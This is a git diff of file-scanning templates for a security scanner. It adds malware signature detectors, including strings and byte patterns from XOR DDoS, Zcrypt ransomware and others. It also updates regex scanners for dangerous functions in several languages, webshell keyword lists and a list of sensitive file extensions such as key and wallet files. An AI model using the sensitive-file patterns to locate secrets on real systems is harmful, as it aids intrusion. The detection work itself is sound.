4a0a00473045022100de21a884f48a0719bc4f2ee4ef7743dd573ac95eff672f1593fd0645dbd63cb5022027b0a93e2dcd4d005fbd53e222c2377c7aebf23269112986ecf201251c520856:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/xor-ddos-malware.yaml b/file/malware/xor-ddos-malware.yaml new file mode 100644 index 0000000000..1ddd0157f9 --- /dev/null +++ b/file/malware/xor-ddos-malware.yaml @@ -0,0 +1,25 @@ +id: xor-ddos-malware + +info: + name: XOR_DDosv1 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "BB2FA36AAA9541F0" + - "md5=" + - "denyip=" + - "filename=" + - "rmfile=" + - "exec_packet" + - "build_iphdr" + condition: and + +# digest: 4b0a004830460221008074e35a2ef70400e3e76588c3d1bf60786f1ce420219e884ccffcdc389b1f5e022100fc59177fbc3a832292f57bc0083333fd895d7523e7b40223b169411d1f256f7a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/yayih-malware.yaml b/file/malware/yayih-malware.yaml new file mode 100644 index 0000000000..b9b2a13b1e --- /dev/null +++ b/file/malware/yayih-malware.yaml @@ -0,0 +1,28 @@ +id: yayih-malware + +info: + name: Yayih Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/bbs/info.asp" + - "\\msinfo.exe" + - "%s\\%srcs.pdf" + - "\\aumLib.ini" + condition: or + + - type: binary + binary: + - "8004087A03C18B45FC8034081903C1413B0A7CE9" + +# digest: 4a0a00473045022100f21491da53356e83942c2502eae399b18e503026b04fd6a04d7e3d666c6253f802207d7efabac7623bd14bff67a913e9bbf35fc19504e5bda37c3a3e350c719ead77:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/zeghost-malware.yaml b/file/malware/zeghost-malware.yaml new file mode 100644 index 0000000000..0db1b50879 --- /dev/null +++ b/file/malware/zeghost-malware.yaml @@ -0,0 +1,19 @@ +id: zeghost-malware + +info: + name: Zegost Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - '392F6633304C693575624F35444E414444784738733736327471593D' + - '00BADA2251426F6D6500' + condition: and + +# digest: 4a0a00473045022037003aa20e994bc79289f19bc0e22ad52153ad14777b74ad17e88141d20454d10221008e9f88d8819669098597631e9d0a9745c5330e9b8a255b6036a0e8d653c6fcd9:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/zoxpng-malware.yaml b/file/malware/zoxpng-malware.yaml new file mode 100644 index 0000000000..24f44b69d6 --- /dev/null +++ b/file/malware/zoxpng-malware.yaml @@ -0,0 +1,18 @@ +id: zoxpng-malware + +info: + name: ZoxPNG Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58" + +# digest: 4b0a00483046022100c9c4e20dcdb3d7419d7e4531d93ebd22b25c13131c670da3f6e4ad98db8457a2022100c52254e4826289e996691e927c8afc58a2421da3603b993852f3ee2205b2c7c8:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/zrypt-malware.yaml b/file/malware/zrypt-malware.yaml new file mode 100644 index 0000000000..d252039c6c --- /dev/null +++ b/file/malware/zrypt-malware.yaml @@ -0,0 +1,35 @@ +id: zrypt-malware + +info: + name: Zcrypt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara + tags: malware,file,zrypt +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "How to Buy Bitcoins" + - "ALL YOUR PERSONAL FILES ARE ENCRYPTED" + - "Click Here to Show Bitcoin Address" + - "MyEncrypter2.pdb" + condition: or + + - type: word + part: raw + words: + - ".p7b" + - ".p7c" + - ".pdd" + - ".pef" + - ".pem" + - "How to decrypt files.html" + condition: and + +# digest: 490a004630440220505b7b0359dfc00b9f7d9f9a654fa51b862140381c8785ca1f1d04cd4ba7f1f00220194afc36d15fcaef2fc487ce83de91edf5ff902675b4c0f06f016c8c7574e74c:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/admzip-path-overwrite.yaml b/file/nodejs/admzip-path-overwrite.yaml index dbf7ea5442..e86f28c8e0 100644 --- a/file/nodejs/admzip-path-overwrite.yaml +++ b/file/nodejs/admzip-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure ZIP archive extraction using adm-zip can result in arbitrary path over write and can result in code injection. tags: file,nodejs,admzip - file: - extensions: - all - matchers: - type: regex regex: @@ -20,3 +18,5 @@ file: - "\\.writeFile\\(.*\\)" - "\\.writeFileSync\\(.*\\) \\}, \\.\\*\\)" condition: or + +# digest: 4b0a00483046022100d3f3fb61dfc42f08f4a89b791f5374e788d8d917e8c701876ebdf5f946e9a559022100a68b85ca82e5fc59479c77c56d1c3abdda513d5863ada63ba5b37d0b5ad5ae94:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/express-lfr.yaml b/file/nodejs/express-lfr.yaml index 6f1f0e5b4e..f9f1e2a537 100644 --- a/file/nodejs/express-lfr.yaml +++ b/file/nodejs/express-lfr.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used. tags: file,nodejs,express,lfr - file: - extensions: - all - matchers: - type: regex regex: @@ -18,3 +16,5 @@ file: - "(\\$[\\w\\W]+?)\\.render\\(\\$[\\w\\W]+?, <[\\w\\W]+? \\\\$[\\w\\W]+?\\.\\$[\\w\\W]+? [\\w\\W]+? >\\)" - "(\\$[\\w\\W]+?)\\.render\\(\\$[\\w\\W]+?, <[\\w\\W]+? \\\\$[\\w\\W]+? [\\w\\W]+? >\\)" condition: or + +# digest: 4b0a00483046022100e7798827d9cc0ed3a27739501621560cd2752e52aba95d220252540f0361afeb022100a8c14ce89e7beca1fb0c19891d37761ed32e3c096e6033a2c2d4a1b77f1a49f6:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/generic-path-traversal.yaml b/file/nodejs/generic-path-traversal.yaml index 8b06ffa1cd..2c4ba7a076 100644 --- a/file/nodejs/generic-path-traversal.yaml +++ b/file/nodejs/generic-path-traversal.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: @@ -18,4 +16,6 @@ file: - "[^\\.]*\\.readFile\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileSync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileAsync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - condition: or \ No newline at end of file + condition: or + +# digest: 4b0a00483046022100e21a018d792fd5746301590fee7667c09666ad26347732653bdf90db09245f150221008bddd8b9b51c116885885104f24ed7cda9f5ba500680a85415390a22c4584a8b:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/tar-path-overwrite.yaml b/file/nodejs/tar-path-overwrite.yaml index 22dc649a1f..d44cf74078 100644 --- a/file/nodejs/tar-path-overwrite.yaml +++ b/file/nodejs/tar-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: @@ -18,4 +16,6 @@ file: - "[\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - condition: or \ No newline at end of file + condition: or + +# digest: 490a0046304402207e72208a1944e7df2a904fe5c6f0286522d073ca069018194bf4e461a96c7f030220657b4086fb9b504fdfd3ee97fe79018b05f66382b367ba76d019e1d3e0a61c82:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/xss-disable-mustache-escape.YAML b/file/nodejs/xss-disable-mustache-escape.yaml similarity index 70% rename from file/nodejs/xss-disable-mustache-escape.YAML rename to file/nodejs/xss-disable-mustache-escape.yaml index 8d8918dbb8..92ca34e5af 100644 --- a/file/nodejs/xss-disable-mustache-escape.YAML +++ b/file/nodejs/xss-disable-mustache-escape.yaml @@ -6,12 +6,12 @@ info: severity: info description: Markup escaping disabled. This can be used with some template engines to escape disabling of HTML entities, which can lead to XSS attacks. tags: file,nodejs,mustache,xss - file: - extensions: - all - matchers: - type: regex regex: - "[\\w\\W]+?\\.escapeMarkup = false" + +# digest: 4a0a00473045022041c26d15e30a67da51faf8296e3dcfa26d1debb48e546df53fd49950ac2755bc022100ba0c25be763311d27fd4b84f86a184a622246c44589a783faac58165f161b5c9:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/xss-serialize-javascript.yaml b/file/nodejs/xss-serialize-javascript.yaml index 011b11c797..9f25a2c7fc 100644 --- a/file/nodejs/xss-serialize-javascript.yaml +++ b/file/nodejs/xss-serialize-javascript.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS). tags: file,nodejs,serialize,xss - file: - extensions: - all - matchers: - type: regex regex: @@ -24,3 +22,5 @@ file: - "escape\\(.*?\\)" - "encodeURI\\(.*?\\)" condition: or + +# digest: 4b0a00483046022100c969127d5164e847745c08918d013ec03653d1ebd3df975a2ebba346eabc86ca022100eb6452e18b4c019fede7e45505c43395c0a854ec7842beb502dfed933b126877:922c64590222798bb761d5b6d8e72950 diff --git a/file/nodejs/zip-path-overwrite.yaml b/file/nodejs/zip-path-overwrite.yaml index 6feb0c66d4..c8bdd738c3 100644 --- a/file/nodejs/zip-path-overwrite.yaml +++ b/file/nodejs/zip-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure ZIP archive extraction can result in arbitrary path overwrite and can result in code injection. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: @@ -26,3 +24,5 @@ file: - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\)" condition: or + +# digest: 4a0a00473045022047f3632b4b629a718f03f122923ecb7a440173d05eff63495de945c7eecaa959022100c898c664cdbf7a53469f2d4f41fb76df1580af59737082875247e0e42a4d70c8:922c64590222798bb761d5b6d8e72950 diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml index 0f9d282237..fadabedf1d 100644 --- a/file/perl/perl-scanner.yaml +++ b/file/perl/perl-scanner.yaml @@ -5,14 +5,13 @@ info: author: geeknik severity: info tags: perl,file - file: - extensions: - - pl # default - - perl # uncommon - - pod # plain old documentation - - pm # perl module - - cgi # common gateway interface + - pl # default + - perl # uncommon + - pod # plain old documentation + - pm # perl module + - cgi # common gateway interface extractors: - type: regex @@ -20,48 +19,59 @@ file: regex: - 'srand' - 'rand' + - type: regex regex: - 'getc' - 'readdir' - 'read' - 'sysread' + - type: regex # When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely. regex: - 'exec' + - type: regex # The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them. regex: - 'fcntl' + - type: regex # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice. regex: - 'bind' + - type: regex # When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed. regex: - 'setpgrp' + - type: regex # When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system. regex: - 'setpriority' + - type: regex # Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function. regex: - 'syscall' + - type: regex # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data. regex: - 'connect' + - type: regex # When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run. regex: - 'system' + - type: regex # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a component of it. Strings should be checked for occurrences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed. regex: - 'open' + - type: regex # When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value. regex: @@ -74,32 +84,41 @@ file: - 'symlink' - 'truncate' - 'chroot' + - type: regex # Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe. regex: - 'umask' + - type: regex # Avoid constructing the list of process ids to kill with any strings that contain user inputted data. Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks. regex: - 'kill' + - type: regex # Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways. regex: - 'ioctl' + - type: regex # Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval. regex: - 'eval' + - type: regex # Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns. regex: - 'glob' + - type: regex # Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams. regex: - 'fork' + - type: regex # DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted. regex: - 'gethostbyname' - 'gethostbyaddr' + +# digest: 4a0a00473045022100fbd7b50a240a33711df2a0f790ba06a15bcf1aa8a14085015a5b5e53c03df7cd02206d81256adc29f4c4ec6338882c5287986ffa812170c16361dc96163e2df71b29:922c64590222798bb761d5b6d8e72950 diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index d2bb1f4865..2be880ba8e 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -5,7 +5,6 @@ info: author: geeknik severity: info tags: php,file - file: - extensions: - html @@ -30,36 +29,44 @@ file: # Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id')); regex: - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace' + - type: regex # Warn when var_dump is found regex: - 'var_dump' + - type: regex # Warn when display_errors is enabled manually regex: - 'display_errors' + - type: regex # Avoid the use of eval() regex: - 'eval' - 'eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))' + - type: regex # Avoid the use of exit or die() regex: - 'exit' - 'die' + - type: regex # Avoid the use of logical operators (ex. using and over &&) regex: - 'and' + - type: regex # Avoid the use of the ereg* functions (now deprecated) regex: - 'ereg' + - type: regex # Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE) regex: - 'extract' + - type: regex # Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options regex: @@ -69,73 +76,91 @@ file: - 'print_r' - 'vprintf' - 'sprintf' + - type: regex # Ensuring you're not using echo with file_get_contents regex: - 'file_get_contents' + - type: regex # Testing for the system execution functions and shell exec (backticks) regex: - '\\`' + - type: regex # Use of readfile, readlink and readgzfile regex: - 'readfile' - 'readlink' - 'readgzfile' + - type: regex # Using parse_str or mb_parse_str (writes values to the local scope) regex: - 'parse_st' - 'mb_parse_str' + - type: regex # Using session_regenerate_id either without a parameter or using false regex: - 'session_regenerate' + - type: regex # Avoid use of $_REQUEST (know where your data is coming from) regex: - '\\$_REQUEST' + - type: regex # Don't use mysql_real_escape_string regex: - 'mysql_real_escape_string' + - type: regex # Avoiding use of import_request_variables regex: - 'import_request_variables' + - type: regex # Avoid use of GLOBALS regex: - 'GLOBALS' + - type: regex regex: - '_GET' + - type: regex regex: - '_POST' + - type: regex regex: - '_COOKIE' + - type: regex regex: - '_SESSION' + - type: regex # Ensure the use of type checking validating against booleans (===) regex: - '\\=\\=\\=' + - type: regex # Ensure that the /e modifier isn't used in regular expressions (execute) regex: - '\\/e' + - type: regex # Using concatenation in header() calls regex: - 'header' + - type: regex # Avoiding the use of $http_raw_post_data regex: - '\\$http_raw_post_data' + - type: regex # interesting functions for POP/Unserialize regex: @@ -149,110 +174,139 @@ file: - "__set" - "__isset" - "__unset" + - type: regex # phpinfo detected regex: - "phpinfo" + - type: regex # registerPHPFunctions() allows code exec in XML regex: - "registerPHPFunctions" + - type: regex regex: - "session_start" + - type: regex # dBase DBMS regex: - "dbase_open" + - type: regex # DB++ DBMS regex: - "dbplus_open" - "dbplus_ropen" + - type: regex # Frontbase DBMS regex: - "fbsql_connect" + - type: regex # Informix DBMS regex: - "ifx_connect" + - type: regex # IBM DB2 DBMS regex: - "db2_(p?)connect" + - type: regex # FTP server regex: - "ftp_(ssl_)?connect" + - type: regex # Ingres DBMS regex: - "ingres_(p?)connect" + - type: regex # LDAP server regex: - "ldap_connect" + - type: regex # msession server regex: - "msession_connect" + - type: regex # mSQL DBMS regex: - "msql_(p?)connect" + - type: regex # MsSQL DBMS regex: - "mssql_(p?)connect" + - type: regex # MySQL DBMS regex: - "mysql_(p?)connect" + - type: regex # MySQLi Extension regex: - "mysqli((_real)?_connect)?|_query" + - type: regex # Oracle OCI8 DBMS regex: - "oci|(_new?)|_connect|(n?|p?)logon" + - type: regex # Oracle DBMS regex: - "ora_(p?)connect" + - type: regex # Ovrimos SQL DBMS regex: - "ovrimos_connect" + - type: regex # PostgreSQL DBMS regex: - "pg_(p?)connect" + - type: regex # SQLite DBMS regex: - "sqlite_(p?)open" + - type: regex # SQLite3 DBMS regex: - "SQLite3" + - type: regex # Sybase DBMS regex: - "sybase_(p?)connect" + - type: regex # TokyoTyrant DBMS regex: - "TokyoTyrant" + - type: regex # XML document regex: - "x(ptr|path)_new_context" + - type: regex # Investigate if GetTableFields is called safely regex: - "GetTableFields" + - type: regex regex: - "ini_get.*magic_quotes_gpc.*" + +# digest: 4a0a00473045022100cdc04b80c9479b1a4fe8a4dd836ca51e473d21b6dfee8a10d4766eab8980dd66022002ed5ea70b600f04f8842ba1b24b70122656832d5769131b53c765c8f678a62a:922c64590222798bb761d5b6d8e72950 diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 8efec98d89..867258791c 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -9,7 +9,6 @@ info: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html tags: python,file,sast - file: - extensions: - py @@ -21,26 +20,38 @@ file: - 'exec' - 'eval' - '__import__' + - 'execfile' - type: regex name: command-injection regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' - - 'os.popen' + - 'os.popen\d?' + - 'subprocess.run' + - 'commands.getoutput' - type: regex name: untrusted-source regex: - - 'pickle.loads' - - 'cPickle.loads' + - 'pickle\.loads' + - 'c?Pickle\.loads?' + - 'marshal\.loads' + - 'pickle\.Unpickler' - type: regex name: dangerous-yaml regex: - - 'yaml.load' + - 'yaml\.load' + - 'yaml\.safe_load' - type: regex name: sqli regex: - - 'cursor.execute' \ No newline at end of file + - 'cursor\.execute' + - 'sqlite3\.execute' + - 'MySQLdb\.execute' + - 'psycopg2\.execute' + - 'cx_Oracle\.execute' + +# digest: 4a0a00473045022100d5b183fba0418cf56693190a2b1b1112a53d5b2584f31c07241959a209caafac02200f7da04a1708afc23df42188fcae13c0efae39881a4179b4ecec77ce2e9843c7:922c64590222798bb761d5b6d8e72950 diff --git a/file/url-analyse/url-extension-inspector.yaml b/file/url-analyse/url-extension-inspector.yaml new file mode 100644 index 0000000000..b433d1ce1b --- /dev/null +++ b/file/url-analyse/url-extension-inspector.yaml @@ -0,0 +1,272 @@ +id: url-extension-inspector + +info: + name: URL Extension Inspector + author: ayadim + severity: unknown + description: | + This template assists you in discovering intriguing extensions within a list of URLs. + reference: + - https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/ + tags: file,urls,extension +file: + - extensions: + - all + + extractors: + - type: regex + name: Hot finding + regex: + - "(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\.(7z|bz2|gz|lz|rar|tar\\.gz|tar\\.bz2|xz|zip|z)" + + - type: regex + name: Backup file + regex: + - "(?i)(\\.bak|\\.backup|\\.bkp|\\._bkp|\\.bk|\\.BAK)('|\")" + + - type: regex + name: PHP Source + regex: + - "(?i)(\\.php)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)('|\")" + + - type: regex + name: ASP Source + regex: + - "(?i)(\\.asp)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)('|\")" + + - type: regex + name: Database file + regex: + - "(?i)\\.db|\\.sql('|\")" + + - type: regex + name: Bash script + regex: + - "(?i)(\\.sh|\\.bashrc|\\.zshrc)('|\")" + + - type: regex + name: 1Password password manager database file + regex: + - "(?i)\\.agilekeychain('|\")" + + - type: regex + name: ASP configuration file + regex: + - "(?i)\\.asa('|\")" + + - type: regex + name: Apple Keychain database file + regex: + - "(?i)\\.keychain('|\")" + + - type: regex + name: Azure service configuration schema file + regex: + - "(?i)\\.cscfg('|\")" + + - type: regex + name: Compressed archive file + regex: + - "(?i)(\\.zip|\\.gz|\\.tar|\\.rar|\\.tgz)('|\")" + + - type: regex + name: Configuration file + regex: + - "(?i)(\\.ini|\\.config|\\.conf)('|\")" + + - type: regex + name: Day One journal file + regex: + - "(?i)\\.dayone('|\")" + + - type: regex + name: Document file + regex: + - "(?i)(\\.doc|\\.docx|\\.rtf)('|\")" + + - type: regex + name: GnuCash database file + regex: + - "(?i)\\.gnucash('|\")" + + - type: regex + name: Include file + regex: + - "(?i)\\.inc('|\")" + + - type: regex + name: XML file + regex: + - "(?i)\\.xml('|\")" + + - type: regex + name: Old file + regex: + - "(?i)\\.old('|\")" + + - type: regex + name: Log file + regex: + - "(?i)\\.log('|\")" + + - type: regex + name: Java file + regex: + - "(?i)\\.java('|\")" + + - type: regex + name: SQL dump file + regex: + - "(?i)\\.sql('|\")" + + - type: regex + name: Excel file + regex: + - "(?i)(\\.xls|\\.xlsx|\\.csv)('|\")" + + - type: regex + name: Certificate file + regex: + - "(?i)(\\.cer|\\.crt|\\.p7b)('|\")" + + - type: regex + name: Java key storte + regex: + - "(?i)\\.jks('|\")" + + - type: regex + name: KDE Wallet Manager database file + regex: + - "(?i)\\.kwallet('|\")" + + - type: regex + name: Little Snitch firewall configuration file + regex: + - "(?i)\\.xpl('|\")" + + - type: regex + name: Microsoft BitLocker Trusted Platform Module password file + regex: + - "(?i)\\.tpm('|\")" + + - type: regex + name: Microsoft BitLocker recovery key file + regex: + - "(?i)\\.bek('|\")" + + - type: regex + name: Microsoft SQL database file + regex: + - "(?i)\\.mdf('|\")" + + - type: regex + name: Microsoft SQL server compact database file + regex: + - "(?i)\\.sdf('|\")" + + - type: regex + name: Network traffic capture file + regex: + - "(?i)\\.pcap('|\")" + + - type: regex + name: OpenVPN client configuration file + regex: + - "(?i)\\.ovpn('|\")" + + - type: regex + name: PDF file + regex: + - "(?i)\\.pdf('|\")" + + - type: regex + name: PHP file + regex: + - "(?i)\\.pcap('|\")" + + - type: regex + name: Password Safe database file + regex: + - "(?i)\\.psafe3('|\")" + + - type: regex + name: Potential configuration file + regex: + - "(?i)\\.yml('|\")" + + - type: regex + name: Potential cryptographic key bundle + regex: + - "(?i)(\\.pkcs12|\\.p12|\\.pfx|\\.asc|\\.pem)('|\")" + + - type: regex + name: Potential private key + regex: + - "(?i)otr.private_key('|\")" + + - type: regex + name: Presentation file + regex: + - "(?i)(\\.ppt|\\.pptx)('|\")" + + - type: regex + name: Python file + regex: + - "(?i)\\.py('|\")" + + - type: regex + name: Remote Desktop connection file + regex: + - "(?i)\\.rdp('|\")" + + - type: regex + name: Ruby On Rails file + regex: + - "(?i)\\.rb('|\")" + + - type: regex + name: SQLite database file + regex: + - "(?i)\\.sqlite|\\.sqlitedb('|\")" + + - type: regex + name: SQLite3 database file + regex: + - "(?i)\\.sqlite3('|\")" + + - type: regex + name: Sequel Pro MySQL database manager bookmark file + regex: + - "(?i)\\.plist('|\")" + + - type: regex + name: Shell configuration file + regex: + - "(?i)(\\.exports|\\.functions|\\.extra)('|\")" + + - type: regex + name: Temporary file + regex: + - "(?i)\\.tmp" + + - type: regex + name: Terraform variable config file + regex: + - "(?i)\\.tfvars('|\")" + + - type: regex + name: Text file + regex: + - "(?i)\\.txt('|\")" + + - type: regex + name: Tunnelblick VPN configuration file + regex: + - "(?i)\\.tblk('|\")" + + - type: regex + name: Windows BitLocker full volume encrypted data file + regex: + - "(?i)\\.fve('|\")" + +# digest: 4a0a004730450220785c78ea3f7c51e19ac9e310581ea751f3abf740e18692a5077070922bb4266e022100a54c2d7503c313074a10895dfb6be5cc92494e5bcb083e32ba83d3a05e5da0b9:922c64590222798bb761d5b6d8e72950 diff --git a/file/webshell/asp-webshell.yaml b/file/webshell/asp-webshell.yaml index cef1e2c90c..5f5b843a1e 100644 --- a/file/webshell/asp-webshell.yaml +++ b/file/webshell/asp-webshell.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: asp,aspx,file,webshell - file: - extensions: - asp @@ -30,4 +29,6 @@ file: - '(?i)ExecuteStatement' - '(?i)cmd.exe' - '(?i)mmshell' - - '(?i)GetCmd' \ No newline at end of file + - '(?i)GetCmd' + +# digest: 490a0046304402205f4df9ce77c729238615089b1cf2310f5574e15ac685df735c05f24fa9b33d5d02206ba3985dfbe3ff1ac6021c4ead721ebe24c54ebc10d32f695a6564563dcdf15b:922c64590222798bb761d5b6d8e72950 diff --git a/file/webshell/jsp-webshell.yaml b/file/webshell/jsp-webshell.yaml index 3396019601..2518d1fc7f 100644 --- a/file/webshell/jsp-webshell.yaml +++ b/file/webshell/jsp-webshell.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: jsp,java,jspx,webshell,file - file: - extensions: - jsp @@ -25,4 +24,6 @@ file: - '(?i)cmd.exe' - '(?i)/bin/sh' - '(?i)/bin/bash' - - '(?i)exeCmd' \ No newline at end of file + - '(?i)exeCmd' + +# digest: 4b0a00483046022100c52ce185c59b043aaf28f5cb0e6a0ef91c7d71a5094888fd6cf1beb8778fcf36022100879fa5886ba403b3f31b9b5c0941048809eb8157d4cf191fcf06ea8fc540f836:922c64590222798bb761d5b6d8e72950 diff --git a/file/webshell/php-webshell.yaml b/file/webshell/php-webshell.yaml index 747b8a97bd..7878eca4a3 100644 --- a/file/webshell/php-webshell.yaml +++ b/file/webshell/php-webshell.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: php,file,webshell - file: - extensions: - php @@ -30,4 +29,6 @@ file: - '65786563' # exec - '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)' - '(?i)b4tm4n' - - '(?i)cmdshell' \ No newline at end of file + - '(?i)cmdshell' + +# digest: 490a00463044022078097d3237ceb0cabb1e0b1c456f4c14b80ea66d392154a136bdb5d453a7dcca0220201d8304738ea91076d9deb51e67c381d87e8f0d953a51743fa29fbd4615963f:922c64590222798bb761d5b6d8e72950 diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index 479a02d38d..b720bd8f88 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -12,12 +12,12 @@ info: cvss-score: 7.2 cwe-id: CWE-79 tags: xss,file - file: - extensions: - js - ts - html + - htm - php - cs - rb @@ -42,6 +42,7 @@ file: - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' - 'iframe(\.srcdoc|\.src)' - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex name: source part: body @@ -50,4 +51,4 @@ file: - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' -# Enhanced by mp on 2022/09/14 +# digest: 